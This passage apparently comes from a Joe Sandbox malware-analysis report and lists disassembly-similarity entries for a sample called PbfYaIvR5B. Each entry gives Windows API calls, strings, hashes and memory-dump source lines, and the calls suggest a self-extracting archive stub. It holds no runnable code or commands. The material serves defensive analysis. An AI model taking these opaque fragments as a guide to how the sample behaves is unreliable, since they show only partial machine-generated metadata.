                                                                                                                    • Instruction ID: 5e88a2411abe865e7d81e8860a42922da4d158b1d595d992bb7b638a547355af
                                                                                                                    • Opcode Fuzzy Hash: 6a48c26050227d4f158f56bd8c8ea4560491fecaf1794b70ad17acdf7e37f9d4
                                                                                                                    • Instruction Fuzzy Hash: DB41E771A0020AABDB109F64DC46BFFBBA9EB44711F104239FD09E7292D73C994487E5
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                    • API String ID: 3519838083-3505469590
                                                                                                                    • Opcode ID: 94d80dfd355aa6b781bcb9f3e09f199848b04d365cd70aeeb878c46e4c94f527
                                                                                                                    • Instruction ID: b85b5b55a530822072e03a4e753f844e0388931d6a9db0e90bf45cf8d4d37752
                                                                                                                    • Opcode Fuzzy Hash: 94d80dfd355aa6b781bcb9f3e09f199848b04d365cd70aeeb878c46e4c94f527
                                                                                                                    • Instruction Fuzzy Hash: C1717CB0B00219EFEB14DFA4CC959AEB7B9FF49310B044169F516A72A1CB34AE42DB54
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00049387
                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 000493AA
                                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 000493C9
                                                                                                                      • Part of subcall function 0004C29A: _wcslen.LIBCMT ref: 0004C2A2
                                                                                                                      • Part of subcall function 00051FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0004C116,00000000,.exe,?,?,00000800,?,?,?,00058E3C), ref: 00051FD1
                                                                                                                    • _swprintf.LIBCMT ref: 00049465
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 000494D4
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00049514
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: rtmp%d
                                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                                    • Opcode ID: 0eb02db52b7f885264deed527c36332152bb07f0c8a43dc83e0fe19bcac74709
                                                                                                                    • Instruction ID: 6c5e383569e63c6033c60e95c5d5ccb0cf79663d9c8a1754f7f893272bcdcd60
                                                                                                                    • Opcode Fuzzy Hash: 0eb02db52b7f885264deed527c36332152bb07f0c8a43dc83e0fe19bcac74709
                                                                                                                    • Instruction Fuzzy Hash: B741B2F1901258A6DF61EBA0CD55EEF737CAF41340F1048B5B649E3052EB788BC99B68
                                                                                                                    APIs
                                                                                                                    • __aulldiv.LIBCMT ref: 0005122E
                                                                                                                      • Part of subcall function 0004B146: GetVersionExW.KERNEL32(?), ref: 0004B16B
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00051251
                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00051263
                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00051274
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00051284
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00051294
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 000512CF
                                                                                                                    • __aullrem.LIBCMT ref: 00051379
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1247370737-0
                                                                                                                    • Opcode ID: b4cfc98c6fcd48d267c032519759a323fc6c34d57de91ed9a942b7ea21d1c1e6
                                                                                                                    • Instruction ID: bab263dcb6ef7630c17be8421d7c4b39e0e7257f1f0d475dfb44facc70e35667
                                                                                                                    • Opcode Fuzzy Hash: b4cfc98c6fcd48d267c032519759a323fc6c34d57de91ed9a942b7ea21d1c1e6
                                                                                                                    • Instruction Fuzzy Hash: 52413DB15083059FD710DF65C8849ABBBF9FF88315F40892EF99AD2210E738E649DB51
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00042536
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                      • Part of subcall function 000505DA: _wcslen.LIBCMT ref: 000505E0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                                    • Opcode ID: f29f8a1f08a5f95a6e6bb03761acbabfcc8e14194ddfc7f519bea679598cccc1
                                                                                                                    • Instruction ID: 473bfdd0e5e4b29d1da965cf4b069fe2aa517b596011192ae8fef439ddeeb0e3
                                                                                                                    • Opcode Fuzzy Hash: f29f8a1f08a5f95a6e6bb03761acbabfcc8e14194ddfc7f519bea679598cccc1
                                                                                                                    • Instruction Fuzzy Hash: 63F132F07052409ADB24EF2488D5BEE77DA6B80300F48457DFC8A9B283DB649949C76A
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                    • API String ID: 176396367-3568243669
                                                                                                                    • Opcode ID: 02c5a8d7cf63b9edacf620db1c0a1fd29cd726c2b1766269e490b4ed1cf97884
                                                                                                                    • Instruction ID: 6783b03b26e2c9fce017a520ee037397e74cb437a70f2b07dda5c493dfb20557
                                                                                                                    • Opcode Fuzzy Hash: 02c5a8d7cf63b9edacf620db1c0a1fd29cd726c2b1766269e490b4ed1cf97884
                                                                                                                    • Instruction Fuzzy Hash: 58514466700323D1DB709A299C127B773F5DFA1792F69042AFDC18B2C1FBA58C898271
                                                                                                                    APIs
                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0006FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0006F6CF
                                                                                                                    • __fassign.LIBCMT ref: 0006F74A
                                                                                                                    • __fassign.LIBCMT ref: 0006F765
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0006F78B
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0006FE02,00000000,?,?,?,?,?,?,?,?,?,0006FE02,00000000), ref: 0006F7AA
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0006FE02,00000000,?,?,?,?,?,?,?,?,?,0006FE02,00000000), ref: 0006F7E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1324828854-0
                                                                                                                    • Opcode ID: b7fac9ac33d2a5b25907a1a9682c08158a0d4ffae47198cb8518eda26087780e
                                                                                                                    • Instruction ID: 23dd5c2e1e00c6cc731e7bc47e34f768745cf3869d83b75ed1b843e67bb30f87
                                                                                                                    • Opcode Fuzzy Hash: b7fac9ac33d2a5b25907a1a9682c08158a0d4ffae47198cb8518eda26087780e
                                                                                                                    • Instruction Fuzzy Hash: 695177B1D0024A9FDB10CFA8EC45AEEBBFAFF09310F14416AE555E7251D774AA41CBA0
                                                                                                                    APIs
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00062937
                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0006293F
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 000629C8
                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 000629F3
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00062A48
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                    • Opcode ID: 5577cc0f7e0ba512c60646f5ab129e6f99dc58961d7427f49826ce25d6fa2c77
                                                                                                                    • Instruction ID: f5407d2d0298f38d8dc876fc9e526d95cafa912320ae134bf619fd0bfe06b26b
                                                                                                                    • Opcode Fuzzy Hash: 5577cc0f7e0ba512c60646f5ab129e6f99dc58961d7427f49826ce25d6fa2c77
                                                                                                                    • Instruction Fuzzy Hash: B041A134E00608AFCF10DF68C885ADEBBF6AF44324F148055E819AB393DB759A55CFA1
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00059EEE
                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00059F44
                                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00059FDB
                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00059FE3
                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00059FF9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$RectText
                                                                                                                    • String ID: RarHtmlClassName
                                                                                                                    • API String ID: 3937224194-1658105358
                                                                                                                    • Opcode ID: 4b7688a97921b295908884e030d44bc43480d437ac2c6775cedeba16925355ff
                                                                                                                    • Instruction ID: 245dfc77c54b9b83a20d1dbd52ca2b75ae77f107fba044622227c7d77a890c84
                                                                                                                    • Opcode Fuzzy Hash: 4b7688a97921b295908884e030d44bc43480d437ac2c6775cedeba16925355ff
                                                                                                                    • Instruction Fuzzy Hash: 3741C031104610EFDB615F64DC4DB6BBFA8FF49702F004669FD499A096CB38DA49CB61
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                    • API String ID: 176396367-3743748572
                                                                                                                    • Opcode ID: 3ea502bc8d4c1cd677f19b3202499c778405c9ebd0ec99652a4082629be525ac
                                                                                                                    • Instruction ID: 633aec8f630fde07daf6cf8ec3b5682cb4a9916d73b03319a95e5062cc8a1330
                                                                                                                    • Opcode Fuzzy Hash: 3ea502bc8d4c1cd677f19b3202499c778405c9ebd0ec99652a4082629be525ac
                                                                                                                    • Instruction Fuzzy Hash: BC317032644345D6DA30AB549C42BBB73E8EB90321F50842FFC86872C1FB65AD4883F6
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0006C868: _free.LIBCMT ref: 0006C891
                                                                                                                    • _free.LIBCMT ref: 0006C8F2
                                                                                                                      • Part of subcall function 00068DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?), ref: 00068DE2
                                                                                                                      • Part of subcall function 00068DCC: GetLastError.KERNEL32(?,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?,?), ref: 00068DF4
                                                                                                                    • _free.LIBCMT ref: 0006C8FD
                                                                                                                    • _free.LIBCMT ref: 0006C908
                                                                                                                    • _free.LIBCMT ref: 0006C95C
                                                                                                                    • _free.LIBCMT ref: 0006C967
                                                                                                                    • _free.LIBCMT ref: 0006C972
                                                                                                                    • _free.LIBCMT ref: 0006C97D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                    • Instruction ID: a7a758ada26351d4d35c6e347f9d0c42419859ccdb23f51a93dd3c185491672e
                                                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                    • Instruction Fuzzy Hash: 96110D71580B04AAE630B7B2CC07FDB7BAE9F06B00F404D16B2DD67093DE65A505C760
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0005E669,0005E5CC,0005E86D), ref: 0005E605
                                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0005E61B
                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0005E630
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                    • API String ID: 667068680-1718035505
                                                                                                                    • Opcode ID: 8bbbd7c575080f2b356c65589a1a22e5a39db27f6d5059f88a5d9ce670cb29c1
                                                                                                                    • Instruction ID: 8af607722d8e4f192eb6107abf52e7a7adb8ba4ac7bcb3ea29f65a665b24ae8c
                                                                                                                    • Opcode Fuzzy Hash: 8bbbd7c575080f2b356c65589a1a22e5a39db27f6d5059f88a5d9ce670cb29c1
                                                                                                                    • Instruction Fuzzy Hash: 16F0C831B40BB25B6F694E64DC946EB22C86B267D33004439DD89D7140EB5CCF589794
                                                                                                                    APIs
